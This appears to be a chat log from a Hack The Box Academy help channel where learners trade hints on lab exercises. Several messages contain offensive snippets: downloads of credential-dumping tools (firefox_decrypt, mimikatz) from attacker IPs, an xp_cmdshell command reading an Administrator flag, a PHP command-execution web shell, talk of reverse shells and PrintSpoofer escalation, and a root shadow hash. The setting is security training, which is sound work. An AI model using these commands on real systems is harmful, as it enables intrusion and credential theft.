yeah, i get the idea. thanks
substituting a portion of it for the output of that command
usually used with some for loops for simple automation scripts to run through a list
but can be useful for other instances
i did similar stuff in python
ah so you know it's like calling a function to get a variable
yeah yeah. i get it bro
congrats (we don't care)
What is the SSH key of NASA?
they've been yeeted already
btw, can you guys give me some command injection machine links?
I am ravaging google but all they give is some writeups and walkthroughs
you can do the machines in the walkthrough
no machine is only command injection, cozyhosting has it in the attack chain, the others I could think of is probably too advanced
why are there hardly any ctf on command inj?
Offsec Proving grounds Shakabrah has it
command injection is only a small part of it
so it is not very important i guess?
because if I google "sqli" or "xss" there are millions of ctfs on them
it's important to know; but it's not a central part of it
there's a million different types of sqli and xss vulns
because there isn't much variation for just command injections, you either figure it out or you don't
command inject is just "oh i can run command in this"
i guess ill skip command inj practice. it should be better to move on to other topics. what do ya say?
¯\_(ツ)_/¯
it looks like your fav text art
there's a module that includes it i believe but you're also chatting in the academy modules channel about it
the problem is i don't have cubes 😦
acquire money
¯\_(ツ)_/¯
if you participate in the seasons you can earn some academy vouchers and stuff
student is only $8 a month
those are only good for annual subs in academy
there is a dollar crisis in my country. So even 8 bucks is a lot of money
Can I chat to anybody about the AD Enumeration Skills Check - Part 2? I'm stuck on getting the Administrator flag on MS01
check with all the users you have
I think I must have missed a user. I see from bloodhound which one I need, just don't have a hash or password for them
probably, dump the usual things
Thanks. Got it.
Y’all ever get so involved with a lab that you lose track of time, 3 hours past my bedtime but I finished HTBA Password Attacks medium lol, harder than I anticipated
gz but be mindful there are places for these ( #starting-point )
Yes sir
I am stuck at Linux Fundamental Questions regarding How many Partition Exists in PwnBox I tried fdisk -l mount and stuff but I can't seem to get it
fdisk -l will give you the answer
Na It didn't I tried
count it
How to count I mean I tried from 1-10 but it didn't work either
If I move on from a module to the next section, does the target box die? I'm doing a password spray that is taking eternity and would like to move on.
make sure there's no spaces in your answer
only if you spawn another target
too ez. Thanks, pity all the next modules have targets. Thanks for this.
The answer must be a number, right? So I guess there are no spaces
the format is given in the question, a single number
I randomly got the answer but don't know why. I can count to 2 but what is the other one
you are running the command in pwnbox?
Yes
I can clearly see the list of partitions which gives the answer 🤷♂️
- 0 Examine the target and find out the password of the user Will. Then, submit the password as the answer. can someone help? i mutated kira's password for ssh but it doesn't work
hi guys how i earn cubes
start with ftp
i have only 20 cubes at this time so how i unlock tier2 modules
bro i have no money
why
that is sad but there is no way to get more cubes than what you started with
any other option to get cubes
compete in ctfs that have prizes related to hackthebox
^
which platform i play ctf
no idea, you will have to look around
ftp didnt work either
use the mutated list
please, anyone guide me on what i should do.
lowercase is important
Kira is different from kira
use lowercase
for the name
o i c
Thank you very much
do ftp and ssh share same password?
why does ftp bruteforce work for ssh too?
if i find the ftp password for a user and use it for ssh it works, why?
Maybe @fathom pendant will do the module for you so you don't have to try?
password reuse.
oh i c thanks
I can see 2 but where is third one?
wdym where's the third it's clearly listed? vda{X}
I have vda and vdb but can't find vdaX
(X is a sub)
there's also no vdb in pwnbox, again, are you running the command in pwnbox
Could also be that both FTP and SSH are using system users for auth?
yep
this tbh
are you confusing the Parrot HTB-Edition vm for pwnbox?
(common thing to happen)
No I am Using PwnBox from Website
Hey, I don't know if it's the right place for such feedback, but there are a lot of places in the AD Course where it states "In this section, we will move back and forth between a Windows and Linux attack host as we work through the various examples. You can spawn the hosts for this section at the end of this section and RDP into the MS01 Windows attack host. For the portions of this section that require interaction from a Linux host, you can open a PowerShell console on MS01 and SSH to 172.16.5.225 with the credentials htb-student:HTB_@cademy_stdnt!." In fact that Linux box also has an IP that is reachable via VPN, so every time I have to RDP to the Windows box, then SSH to the Parrot VM, check its IP, and then I can SSH directly to the Parrot box. It would be so much easier to just print both IPs on the page when you spawn the VM
#858470491676737536 fits better (also best to specify AD Enum and Attacks as there's a couple of "AD" courses)
guys any tips for the linux password attacks? i tried to transfer firefox decrypt and lazagne but none of them work i checked the hist too
what exactly doesn't work ?
you tried to run an exe on linux?
yeap
I mean if you want help, give specific error messages / codes etc
does not work won't help 🙂
```
curl -o ./firefoxs.py http://10.10.15.16/firefox_decrypt.py
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   335  100   335    0     0   1735      0 --:--:-- --:--:-- --:--:--  1744
kira@nix01:~$ chmod +x firefoxs.py
kira@nix01:~$ python3 firefoxs.py
  File "firefoxs.py", line 1
    <!DOCTYPE HTML>
    ^
SyntaxError: invalid syntax
```
as you see " <!DOCTYPE HTML>"you got an html file
an exe is a windows executable
not a python file... Looks like your url is wrong somehow, or at least throwing an error
Maybe you downloaded the html file instead of the raw python on the remote server? get https://raw.githubusercontent.com/unode/firefox_decrypt/main/firefox_decrypt.py
Also personally, if you just need to copy a single python file, copy/pasting over ssh might be the easiest way 😄
wget is often better for pulling files
but i cant find nothing...
firefox decrypt is the way
but it doesnt work
as you saw curl got you an html file for w/e reason
You likely need to give the file as argument to python with --profile args
wat dat mean? i used python3.9 and it worked and i got flag
but also I was about to mention check your python version, this line PWStore = list[dict[str, str]] is a declarative type of variable, it's available only on recent python versions
o i c
from this doc though seems supported since 3.5 https://docs.python.org/3/library/typing.html so that python version must have been very old 😄
He did python3 firef.py so should have used python3
the labs are also just clunky
#modules Need help on HTB Academy Crest Pathway. Currently stuck on:
Analyzing Evil With Sysmon & Event Logs - Question 1
"Replicate the DLL hijacking attack described in this section and provide the SHA256 hash of the malicious WININET.dll as your answer. "C:\Tools\Sysmon" and "C:\Tools\Reflective DLLInjection" on the spawned target contain everything you need."
I have completed the following:
- Sysmon Install
- Changed the config file using Notepad to "Exclude"
- Updated the config file
- Changed the required dll file to what the question asks
- Moved both calc.exe and the changed dll file to desktop
.... The message box still does not appear?
Any help would be greatly appreciated!
I take it you're remoted into the specified target
With my computer 🤷
with my samsung smart fridge
mom said it's my turn with your computer
Is there any section in the CBBH that discusses how to bypass the removal of < > from the server-side?
Which module, which section?
Im asking if something like this or similar is mentioned in the CBBH modules?
i mean it feels like a very broad (and kinda odd question) what do you mean removal of <>
like are you referring to a specific type of attack?
are you referring to removing them from like the webpage?
the server side removes any thing between the brackets directly
yup
RDP admin account
whats the recommended path, do i stick with academy or visit the 2 other sites first
http encoding?
I think marcie meant URL encoding
I went str8 for the academy and pentester path, I am pretty happy.
what are the 2 other sites
main and ctf
there's nothing stopping you from doing all 3 at once, academy is more beginner friendly
Hello hackers. I have 2 questions regarding nmap.
-
"It is also useful when the target host has a personal firewall that drops incoming packets but allows outgoing packets. In this case, a Connect scan can bypass the firewall and accurately determine the state of the target ports. " -- What does it talk about? Since the firewall drops an incoming packet, how come there is a corresponding outgoing packet?? And compared with a SYN scan, if the state of the target ports can be determined by a Connect scan, it should be able to be determined by a SYN scan, isn't it?
-
"However, it is important to note that the Connect scan is slower than other types of scans because it requires the scanner to wait for a response from the target after each packet it sends, which could take some time if the target is busy or unresponsive. " -- I don't understand why
-sT, a connect scan takes longer than SYN scan. "It requires the scanner to wait for a response from the target" so does SYN scan!
Any thought / answer is appreciated!
Hi, I have a problem connecting by RDP to a Windows machine in the labs. It crashes every minute. Do you have any idea how I can fix this problem? Thanks
reach out to support
https://nmap.org/book/man-port-scanning-techniques.html
This technique is often referred to as half-open scanning, because you don't open a full TCP connection. You send a SYN packet, as if you are going to open a real connection and then wait for a response.
the tcp handshake is never completed for syn scans, so it's faster. as for the other question, I guess if some packets do get through, the full tcp connection can be more accurate
also try tcp for vpn
Hey! Can anyone give me some insight on the "Password Attacks Lab - Hard" Skills Assessment? There is a BitLocker encrypted .vhd, which I have gotten open on Linux using qemu-util and cryptsetup. The modules try to give you the necessary tools for the job, but I could not figure out a way to get this thing mounted without external tools not mentioned on the module.
Just making sure I'm not missing some super simple, easy way. Mounting required Admin rights on the Windows target machine, so could not do that, as suggested on the module.
I have solved the assessment itself, but I'm curious to learn.
mount it in a windows vm
Yeah, that is the obvious one. I have a Linux VM set up, but figured it should be possible without a Windows VM considering Pwnbox users 😄
Guess I'll have to set one up for future modules for convenience. Thanks!
hm I'm not sure about that, seems like some work to make it work. but having a windows vm will often come in handy
That is indeed a great tip. I was a bit stubborn, that's really it :p
The modules are great though. Really enjoying the CPTS path thus far
anyone ?
start by describing your exact issue maybe 🙂
I'm on the XSS Phishing, Im sure the URL payload is correct but after sending it, I received "Issue in sending URL!" error
Do you have any idea ?
@full nimbus
I haven't done this module, but generally speaking adding the command you used, the tool, etc will help you to get answers 😉
- I generate a payload based on the module
- Create a temp HTTP server to host my payload and to monitor the request
- Send the URL payload to the victim
- Receive an error "Issue in sending URL!"
P.S I tested the http server without yet sending the payload to the victim and it works, I can see the request contains test creds, this is to make sure that there's no error on the attacker server
but if i send it to url /phishing/send , then i received the error.
Anyone experienced the same error? How were you able to resolve it? TIA
I also tried using URL shortener like bitly but still the same error
community is not active 😐
Have you encoded the payload correctly?
the first part of your url should start with http://<IP>/phishing/index.php
Tried both URL encoded and non encoded
Yes this is the first part of my payload, still have the error
it should be the target ip, not your own
wait how did i hide it, pipe not working.
@next bronze is my whole payload correct ?
I tried sending it both URL encoded and not but still have the same error
Aww, ok let me reset the VM
ah wait you missed something, compare your payload with the example
what do you mean, can't find it
Looks like syntax for the action attribute in the form element is incorrect. It should be enclosed in quotes. For example action="http://<attacker-server>/". the browser may not parse the URL correctly
Let me check that one and see if will work
still the same error even when I enclosed it with quotes
try your own payload, enter something to make sure it works, then use the url from the browser address bar which will be nicely encoded for you
figured it out now
@plain coral is correct, it should be enclosed with quotes
the reason i received error in my first try is the quote was not url encoded
Thank you @next bronze and @plain coral for the help, I appreciate the responses! 🙂
I'll be removing the payload that I pasted to avoid spoilers.
Thank you! 🙂
it works without the quotes
I did repeat it, haha it's actually weird.. now it works both with and without :))
Anyways, thank you so much!
Anyone able to give me a nudge on "Command Injections" skills assessment? I can't seem to find the injection point.
Hey! I have a little problem on the footprinting easy lab, could someone help me please? 🙂
Hi! I'm on AD Enumeration & Attacks - Skills Assessment Part II and got a bit lost on question 7. Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. I was able to log in with the user that I found before using mssqlclient and look around. I gathered some info, got the hash for the SQL01$ user and got a reverse shell with nt service\mssql$sqlexpress but don't know where to go from here. I wasn't able to log in with SQL01 using PtH. What am I missing?
hello, i just finished the skill assessment of "Security Monitoring & SIEM Fundamentals" but i am still perplexed about the "why" in some of the questions. wouldn't you know of a video or a forum thread with some explanations?
I succeeded in getting the key, I changed its rights but I can't connect to the ssh server
have you tried to use xp_cmdshell to read the file maybe ?
tried it, it says no priv for that
when i run xp_cmdshell i am at this account
PS C:\> whoami
nt service\mssql$sqlexpress
i have a reverse shell with xp_cmdshell
xp_cmdshell "type c:\users\administrator\desktop\flag.txt
I meant sth like that
You might need to enable this first, with impacket mssqlclient you can do enable_xp_cmdshell
if you are using the native sql client it might be another way
can also be this is legit blocked 🙂
you didn't close the " in the command. Not sure it would make a diff. Otherwise I dunno 🙂
no diff but thx
I've got a few sections left before doing the assessments for that same track 🙂
just in case, did you try c:\users\administrator.inlanefreight\desktop\flag.txt ?
@wanton timber have you opened the port in the firewall of your host? Sometimes it's as stupid as that 🙂
i already tried but here is an output for you
the thing is that with this user that i logged in with i am already a sysuser in the mssql db, but when i am trying to run xp_cmd i am just a service account, i need to escalate some priv but idk how
From https://academy.hackthebox.com/module/143/section/1275, check the section about SeImpersonatePrivilege,
I've seen some chat about the "KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP" error on the Windows Attack & Defense > PKI-ESC1 module when running the command after copying back the cert.pfx to WS001, but is there an actual fix? I'm using pwnbox through eu-academy-1 and then RDP to kali and then RDP to WS001. This whole module has been shockingly bad when it comes to using RDP. I get constant disconnects, errors when connecting to WS001 via RDP which aren't fixed for days and then they break again within a day. I don't think I've properly been able to learn much in this module due to the constant interruptions
okay turned out that the hash that i got from responder is a net-ntlm, not a user NTLM hash, so now i know what i did wrong, but still no luck.. any ideas?
You can just use mssql client
Enable cmdshell
And use printspoofer
For q7 that is
I found the /etc/krb5.keytab file, tried to utilize it with kinit to impersonate the Linux machine, what am i doing wrong?
copy from windows, paste directly on kali.
Reset machine (yellow button)
change server to EU
I'm already using EU. I directly copied the output of the cert into a file on Kali and called it cert.pem. I ran the 2 commands on Kali (sed and to convert to pfx). I then copied the cert.pfx back to windows using smbclient
that sounds right.
If resetting the instance doesn't work, I have no further recommendations
Thanks. I've contacted support so I'll see if they have any ideas. Do you reset pwnbox or target or both? I don't understand why resetting either would help unless the transfer of cert.pfx back to windows is corrupting it
because I had a similar issue, and it got resolved when i reset the target machine
I'll try that tomorrow. Thanks
Hi everyone, so I was just doing the Linux Fundamentals module and they ask what is the path to the email of the user. I do not understand why the end of the path differs from what the command whoami gives you? Why is it just the username of the one that you have been connected through SSH and not the current username?
Can anyone suggest me a networking course or something like that to build my networking foundation especially related to cybersecurity
I have a basic idea about it
Hi. Could someone help me with the hacking wordpress module? TBH I'm a beginner and idk even if I've to ask here
@stone pasture if you are looking for networking security, Cisco CCNP Security is good
or CCNA Security to start with
Just post your questions here. Tell us what you have tried and what did not work. Then we can nudge you in the right direction
I have some basic idea about networking But want to know and explore deep from cybersecurity pov
Networking Security is quite different from other Cybersecurity fields, but I think Cisco's CCNA / CCNP security certs are good, at least was relevant when I did it 10y ago
Lmao ,😂 I just want to get started to know networking from cybersecurity pov not to specialize in network security not yet atleast
ah I thought you wanted to learn Networking Sec 🙂
so pure networking you can check Cisco's CCNA
there's a few topics that are vendor specific, like CLI & stuff, but all concepts & techs should be explained as well
you also have a module about that on HTB https://academy.hackthebox.com/module/details/34
Thanks, Well... I have to find the name from a "USERS ID2" which must be in "url"/wp-json/wp/v2/users. Using "curl" and "JQ" I can see the ID1's name but not ID2. I used wpscan --url <url> -e u and I can see the ID1's name and ID2 and ID3 too but it doesn't work
submit the full name of the user with id 2
not that difficult
You really don't need a deep dive, intro to networking module is tier 0
doesn't work 😦
im gonna try to do that
Just use powershell?
You have xp_cmdshell
Hey, I'm trying to do the AD Enum & Attacks skill 1, stuck pretty much at the beginning. I'm trying to copy tools to the host using PS C:\windows\system32\inetsrv> iwr http://10.10.16.75:8000/mimikatz.exe -OutFile c:\tmp\mimikatz.exe however the connection is reset. I'm suspecting it's due to windows defender, but all commands I tried to check status and / or disable are giving no output (like sc query windefend, Get-MpComputerStatus) ... I'd take a small insight on this one
Connect via RDP with the Administrator account and submit the flag.txt as your answer.
Attacking Common Services.
I tried to add DisableRestrictedAdmin in order to use pth, didn't work.
Tried to decrypt the admin hash, nothing worked.
Tried to see if password reusage is a thing here, nope it isn't.
Any tips? Does it have to do smth with that crowbar.
I personally used a windows/shell_reverse_tcp payload from msfvenom
To upgrade my shell
But 1 and 2 can be done without that
I have a reverse shell, but just a classic nc one 🙂
So what exactly are you stuck on
1 literally tells you what to do
And 2 is just a matter of following the section
I'm trying to kerberoast, I've tried using New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SQL01.inlanefreight.local:1433" however getting error + FullyQualifiedErrorId : TypeNotFound,Microsoft.PowerShell.Commands.NewObjectCommand. Then I tried to copy rubeus or mimikatz to the machine, but during transfer, the connection gets reset, which I believe is because of windows defender
but I was not able to verify this thru PS either.
And to use impacket, I guess I would need to have connectivity to the DC which I don't
there's probably something stupid I'm overlooking
Setspn
Look into that
tips for Passwd, Shadow & Opasswd in password attacks
In the module, setspn is just used to list account with SPNs https://academy.hackthebox.com/module/143/section/1423, New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken is then used to generate the tickets. I'll google setspn to generate ticket then
setspn -Q MSSQLSvc/SQL01.inlanefreight.local:1433
Sorry, in fact I was looking at question 3 🙂
Gave me the answer to the 2nd question
or how do I transfer LaZagne and make it work on a Linux target?
Question 3: upload mimikatz with the web shell, that's the easiest
And then I upgraded the web shell with the msfvenom payload I mentioned
After that it was just a matter of following the section again
Hey! I've a question for the Footprinting Lab - Medium. I have the password of 'sa' and I tried to connect (RDP protocol) with this command: xfreerdp /u:[The User] /p:[The password] /v:[IP] and I obtained: failed connected. Is it normal?
Alright, thanks a lot 🙂 Seems uploading from the webshell works, not sure why copying mimikatz via Python web server failed
it is the password you find in a file 'imp-----.txt'
'sa:-------------' (this is the format of the file)
Oh, you are French x)
Were you able to upgrade to a Meterpreter shell?
I gave you the payload I used, I did not use meterpreter
It seems much better than the native PowerShell reverse shell... Thanks ;)
Need a pointer on this: "Extend the visualization we created or the "User added or removed from a local group" visualization, if it is available, and enter the common date on which all returned events took place as your answer. Answer format: 20XX-0X-0X" - I don't seem to understand what they want. All dates I have entered have been wrong. Many thanks
Why doesn't hashcat work on root:$6$XePuRx/4eO0WuuPS$a0t5vIuIrBDFx1LyxAozOu.cVaww01u.6dSvct8AYVVI6ClJmY8ZZuPDP7IoXRJhYz4U8.DJUlilUw2EfqhXg.:19032:0:99999:7:::
and then i also tried $6$XePuRx/4eO0WuuPS$a0t5vIuIrBDFx1LyxAozOu.cVaww01u.6dSvct8AYVVI6ClJmY8ZZuPDP7IoXRJhYz4U8.DJUlilUw2EfqhXg.
You're welcome
I think there is a bug on the third question of the Fundamentals of Active Directory Module in the Active Directory Structure section
What is hashcat spitting out or saying @sleek moss
What's your command (attack type, hash type, rules, etc.)?
OpenCL API (OpenCL 3.0 PoCL 4.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
- Device #1: cpu-sandybridge-AMD Ryzen 7 7735U with Radeon Graphics, 6301/12666 MB (2048 MB allocatable), 5MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashfile 'crachfor' on line 1 ($6$XeP...PDP7IoXRJhYz4U8.DJUlilUw2EfqhXg.): Separator unmatched
No hashes loaded.
Started: Thu Jan 11 15:42:47 2024
Stopped: Thu Jan 11 15:42:47 2024
hashcat -m 1700 -a 0 crachfor /usr/share/wordlists/rockyou.txt -o cra $6$XePuRx/4eO0WuuPS$a0t5vIuIrBDFx1LyxAozOu.cVaww01u.6dSvct8AYVVI6ClJmY8ZZuPDP7IoXRJhYz4U8.DJUlilUw2EfqhXg.
That's the hash
I have 0 idea why it doesn't crack
What makes you think it’s mode 1700?
sha512
If I see $6$ I think 1800
It's $6
I see it is
brij
So I'm asking you why you think it's 1700
You are right
^ and likely the module section gives more clarity
One last thing @analog dock, is there a better way to access other devices in the Skill1 lab than going all the time through the Web01 server? Something like chisel maybe?
Ligolo
thanks, I'll have a look 🙂
Yeah, but I don't have write permission
Are you sure about that?😌
Looks like it, I didn't find a place where I can output the exe file
You have command execution, you can just make a Temp directory in C:\
And download the files from your http server, and output them there
Anyone know how long hashcat takes, or should I use a shorter wordlist for the Linux password attack on shadow?
I have no idea what you’re doing
What module or section
It’s either the password.list or the mutated pass list
Got the flag, thanks mate, but I don't think that was the right way to get it 😄
Why not?
IDK, it doesn't feel right 😄
As far as I know, it is
Digging through multiple nc reverse shells
Why multiple reverse nc shells
Because at first I was not able to properly add the commands via xp_cmdshell, so I made a reverse shell on that one
Then with PrintSpoofer
Then run PrintSpoofer and give yourself a nc reverse shell
With the cmdshell
I uploaded from my computer to the attacker machine via Python http.server
and the same way from the attacker machine to the target
This is what worked for me
interesting
Were you able to download tools from the attacker machine?
Is there a way to copy tools from my computer to the target via proxychains?
Yes
I use ligolo
I was not
Try my command 🤷🏼♂️
Probably would have worked as well, it's just a download from the attacker to the target
Hello, I have a track but I can't see how to read the content with the SNMP protocol? Would anyone know how to do that?
https://academy.hackthebox.com/module/112/section/1075
It's basically a log, so you don't have to explicitly reach out for /flag.sh because its output is printed somewhere down there on your screen, just scroll a bit and look for some interesting output IIRC
and don't grep
ahhh okok thanks a lot 🙂
You want everything, or grep HTB
Yeeesss, I was going to grep HTB lol
but in real life, how can you see the scripts being executed in this type of case?
you know ?
You see it has been executed as this is kind of the log / output, and you see /flag.sh has been run
You just run snmpwalk, and try to read the log carefully
I get it thanks a lot 😉
Are you using the right path?
fairly certain.
Did you save your shell in the plug-in before doing the curl? Because it's your payload that needs to be curled at this path to get your shell.
I saved the PHP code like it said and uploaded
It seems like there's no image.php on the server, try to upload your shell again
Try to redo the process, because if you curl your shell and it doesn't find it, either you haven't uploaded it correctly to the file server or there must be a syntax error in your payload.
Don't forget to listen with nc before using curl
image. not image.php
image.php *
are there any file type filters in place?
No, it's just the Getting Started module
Do it again, and make sure to use the right extension
Nope, same error
<?php system('id'); ?> that's what I was supposed to upload, am I missing something?
Yes, but what's the name of the file?
Well, that's for a quick check if RCE works
I named it myphp
It should be myphp.php
I tried using that as the path instead of image.php and it still didn't work
The extension is very important
Did you name it myphp or did you name it myphp.php?
could you please send screenshot like this
I tried with and without .php
Without, it 100% won't work
echo "<?php system('id'); ?>" > filename.php
Now did you actually upload it to that path?
In the terminal?
Yes, then upload the file
For someone who has done the Documentation and Reporting lab, can I ask a question about the KRBTGT hash?
did you upload it?
Yes, and got all the error lines like it said
show me screenshots of how you uploaded
please screenshot like this
Because it uploads it as image.php
Also your PHP code is bad
You put a quote outside the closing parenthesis instead of in it
Sure, you can just ask next time
I changed the path to image.php, now it doesn't return anything when I curl
Read my other feedback
This: <?php system('id'); ?> not this: <?php system('id)'; ?> You put the quote in the wrong place
Got it! Thanks y'all